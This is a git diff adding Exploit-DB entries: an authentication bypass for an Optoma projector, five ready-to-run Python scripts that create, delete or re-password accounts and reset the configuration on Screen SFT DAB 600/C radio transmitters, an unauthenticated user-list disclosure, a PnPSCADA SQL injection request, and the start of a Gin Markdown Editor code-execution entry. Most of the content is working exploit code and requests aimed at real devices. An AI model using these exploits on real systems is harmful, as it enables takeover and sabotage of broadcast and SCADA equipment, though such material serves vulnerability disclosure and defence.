diff --git a/exploits/hardware/remote/51444.txt b/exploits/hardware/remote/51444.txt new file mode 100644 index 000000000..598268172 --- /dev/null +++ b/exploits/hardware/remote/51444.txt @@ -0,0 +1,23 @@ +# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass +# Date: 2023/05/09 +# Exploit Author: Anthony Cole +# Contact: http://twitter.com/acole76 +# Website: http://twitter.com/acole76 +# Vendor Homepage: http://optoma.com +# Version: Optoma 1080PSTX Firmware C02 +# Tested on: N/A +# CVE : CVE-2023-27823 + +Details +By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1". + +GET /index.asp HTTP/1.1 +Host: projector +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: atop=1 +Connection: close \ No newline at end of file diff --git a/exploits/hardware/remote/51455.py b/exploits/hardware/remote/51455.py new file mode 100755 index 000000000..086a45150 --- /dev/null +++ b/exploits/hardware/remote/51455.py @@ -0,0 +1,102 @@ +#!/usr/bin/env python3 +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: The application suffers from a weak session management that can +# allow an attacker on the same network to bypass these controls by reusing +# the same IP address assigned to the victim user (NAT) and exploit crucial +# operations on the device itself. By abusing the IP address property that +# is binded to the Session ID, one needs to await for such an established +# session and issue unauthorized requests to the vulnerable API to manage +# and/or manipulate the affected transmitter. +# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5771 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. + We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +u=input('Enter desired username: ') +p=input('Enter desired password: ') +e='/system/api/userManager.cgx' +m5=hashlib.md5() +m5.update(p.encode('utf-8')) +h=m5.hexdigest() +print('Your sig:',h) +print('Calling object: ssbtObj') +print('CGX fastcall: userManager::newUser') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber++', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'userManager', + 'ssbtObj':{ + 'newUser':{ + 'password':h, + 'type':'OPERATOR', + 'username':u + } + }, + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-5) \ No newline at end of file diff --git a/exploits/hardware/remote/51456.py b/exploits/hardware/remote/51456.py new file mode 100755 index 000000000..bb87cc5e3 --- /dev/null +++ b/exploits/hardware/remote/51456.py @@ -0,0 +1,102 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: The application suffers from a weak session management that can +# allow an attacker on the same network to bypass these controls by reusing +# the same IP address assigned to the victim user (NAT) and exploit crucial +# operations on the device itself. By abusing the IP address property that +# is binded to the Session ID, one needs to await for such an established +# session and issue unauthorized requests to the vulnerable API to manage +# and/or manipulate the affected transmitter. +# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5772 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. + We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +u=input('Enter desired username: ') +p=input('Enter desired password: ') +e='/system/api/userManager.cgx' +m5=hashlib.md5() +m5.update(p.encode('utf-8')) +h=m5.hexdigest() +print('Your sig:',h) +print('Calling object: ssbtObj') +print('CGX fastcall: userManager::changeUserPswd') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber+', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'userManager', + 'ssbtObj':{ + 'changeUserPswd':{ + 'username':u, + 'password':h + } + }, + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-4) \ No newline at end of file diff --git a/exploits/hardware/remote/51457.py b/exploits/hardware/remote/51457.py new file mode 100755 index 000000000..4e46b9247 --- /dev/null +++ b/exploits/hardware/remote/51457.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: The application suffers from a weak session management that can +# allow an attacker on the same network to bypass these controls by reusing +# the same IP address assigned to the victim user (NAT) and exploit crucial +# operations on the device itself. By abusing the IP address property that +# is binded to the Session ID, one needs to await for such an established +# session and issue unauthorized requests to the vulnerable API to manage +# and/or manipulate the affected transmitter. +# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5773 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. + We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +u=input('Enter desired username: ') +e='/system/api/userManager.cgx' +print('Calling object: ssbtObj') +print('CGX fastcall: userManager::removeUser') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber-', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'userManager', + 'ssbtObj':{ + 'removeUser':u + } + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-3) \ No newline at end of file diff --git a/exploits/hardware/remote/51458.py b/exploits/hardware/remote/51458.py new file mode 100755 index 000000000..ea2c28943 --- /dev/null +++ b/exploits/hardware/remote/51458.py @@ -0,0 +1,96 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: This exploit circumvents the control and requirement of admin's +# old password and directly changes the password. +# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5774 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. + We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +p=input('Enter desired password: ') +e='/system/api/userManager.cgx' +m5=hashlib.md5() +m5.update(p.encode('utf-8')) +h=m5.hexdigest() +print('Your sig:',h) +print('Calling object: ssbtObj') +print('CGX fastcall: userManager::changeUserPswd') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber-+', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'userManager', + 'ssbtObj':{ + 'changeUserPswd':{ + 'username':'admin', + 'password':h + } + }, + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-2) \ No newline at end of file diff --git a/exploits/hardware/remote/51459.py b/exploits/hardware/remote/51459.py new file mode 100755 index 000000000..39cbf1304 --- /dev/null +++ b/exploits/hardware/remote/51459.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config +# Exploit Author: LiquidWorm +# +# +# Vendor: DB Elettronica Telecomunicazioni SpA +# Product web page: https://www.screen.it | https://www.dbbroadcast.com +# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +# Affected version: Firmware: 1.9.3 +# Bios firmware: 7.1 (Apr 19 2021) +# Gui: 2.46 +# FPGA: 169.55 +# uc: 6.15 +# +# Summary: Screen's new radio DAB Transmitter is reaching the highest +# technology level in both Digital Signal Processing and RF domain. +# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +# digital adaptive precorrection and configuatio flexibility, the Hot +# Swap System technology, the compactness and the smart system design, +# the SFT DAB are advanced transmitters. They support standards DAB, +# DAB+ and T-DMB and are compatible with major headend brands. +# +# Desc: The application suffers from a weak session management that can +# allow an attacker on the same network to bypass these controls by reusing +# the same IP address assigned to the victim user (NAT) and exploit crucial +# operations on the device itself. By abusing the IP address property that +# is binded to the Session ID, one needs to await for such an established +# session and issue unauthorized requests to the vulnerable API to manage +# and/or manipulate the affected transmitter. +# +# Tested on: Keil-EWEB/2.1 +# MontaVista® Linux® Carrier Grade eXpress (CGX) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5775 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php +# +# +# 19.03.2023 +# + +import hashlib,datetime########## +import requests,colorama######### +from colorama import Fore, Style# +colorama.init() +print(Fore.RED+Style.BRIGHT+ + ''' +██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ +██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ +██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ +██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ +██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ + ''' + +Style.RESET_ALL) +print(Fore.WHITE+Style.BRIGHT+ + ''' + ZSL and the Producers insist that no one + submit any exploits of themselfs or others + performing any dangerous activities. + We will not open or view them. + ''' + +Style.RESET_ALL) +s=datetime.datetime.now() +s=s.strftime('%d.%m.%Y %H:%M:%S') +print('Starting API XPL -',s) +t=input('Enter transmitter ip: ') +e='/system/api/deviceManagement.cgx' +print('Calling object: ssbtObj') +print('CGX fastcall: deviceManagement::reset') +t='http://'+t+e +bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept':'application/json, text/plain, */*', + 'Accept-Language':'ku-MK,en;q=0.9', + 'Accept-Encoding':'gzip, deflate', + 'User-Agent':'Dabber--', + 'Connection':'close'} +j={'ssbtIdx':0, + 'ssbtType':'deviceManagement', + 'ssbtObj':{ + 'reset':'true' + } + } +r=requests.post(t,headers=bh,json=j) +if r.status_code==200: + print('Done.') +else: + print('Error') +exit(-1) \ No newline at end of file diff --git a/exploits/hardware/remote/51460.txt b/exploits/hardware/remote/51460.txt new file mode 100644 index 000000000..879b81ead --- /dev/null +++ b/exploits/hardware/remote/51460.txt @@ -0,0 +1,45 @@ +# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) +# Exploit Author: LiquidWorm + +Vendor: DB Elettronica Telecomunicazioni SpA +Product web page: https://www.screen.it | https://www.dbbroadcast.com + https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ +Affected version: Firmware: 1.9.3 + Bios firmware: 7.1 (Apr 19 2021) + Gui: 2.46 + FPGA: 169.55 + uc: 6.15 + +Summary: Screen's new radio DAB Transmitter is reaching the highest +technology level in both Digital Signal Processing and RF domain. +SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the +digital adaptive precorrection and configuatio flexibility, the Hot +Swap System technology, the compactness and the smart system design, +the SFT DAB are advanced transmitters. They support standards DAB, +DAB+ and T-DMB and are compatible with major headend brands. + +Desc: Screen is affected by an information disclosure vulnerability +due to improper access control enforcement. An unauthenticated remote +attacker can exploit this, via a specially crafted request to gain +access to sensitive information including usernames and source IP +addresses. + +Tested on: Keil-EWEB/2.1 + MontaVista® Linux® Carrier Grade eXpress (CGX) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5776 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php + + +19.03.2023 + +-- + + +$ curl 'http://SFTDAB/system/api/userManager.cgx' +{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}} \ No newline at end of file diff --git a/exploits/hardware/webapps/51448.txt b/exploits/hardware/webapps/51448.txt new file mode 100644 index 000000000..2bb6425fa --- /dev/null +++ b/exploits/hardware/webapps/51448.txt @@ -0,0 +1,22 @@ +# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection +# Date: 15/5/2023 +# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd +# Vendor Homepage: https://pnpscada.com/ +# Version: PnPSCADA (cross platforms): v2.x +# Tested on: Unix +# CVE : CVE-2023-1934 +# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8 + +SQLi crashing point: + +GET /hitlogcsv.isp?userids=1337'&startdate= +2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00 +HTTP/1.1 +Cache-Control: no-cache +User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) +AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 +Safari/534.14 +Host: vulnerablepnpscada.int +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close \ No newline at end of file diff --git a/exploits/multiple/local/51469.txt b/exploits/multiple/local/51469.txt new file mode 100644 index 000000000..b699fb0c4 --- /dev/null +++ b/exploits/multiple/local/51469.txt @@ -0,0 +1,25 @@ +# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution +# Date: 2023-04-24 +# Exploit Author: 8bitsec +# CVE: CVE-2023-31873 +# Vendor Homepage: https://github.com/mariuskueng/gin +# Software Link: https://github.com/mariuskueng/gin +# Version: 0.7.4 +# Tested on: [Mac OS 13] + +Release Date: + +2023-04-24 + +Product & Service Introduction: Javascript Markdown editor for Mac + +Technical Details & Description: +A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file. + +Proof of Concept (PoC): +Arbitrary code execution: + +Create a markdown file (.md) in any text editor and write the following payload: +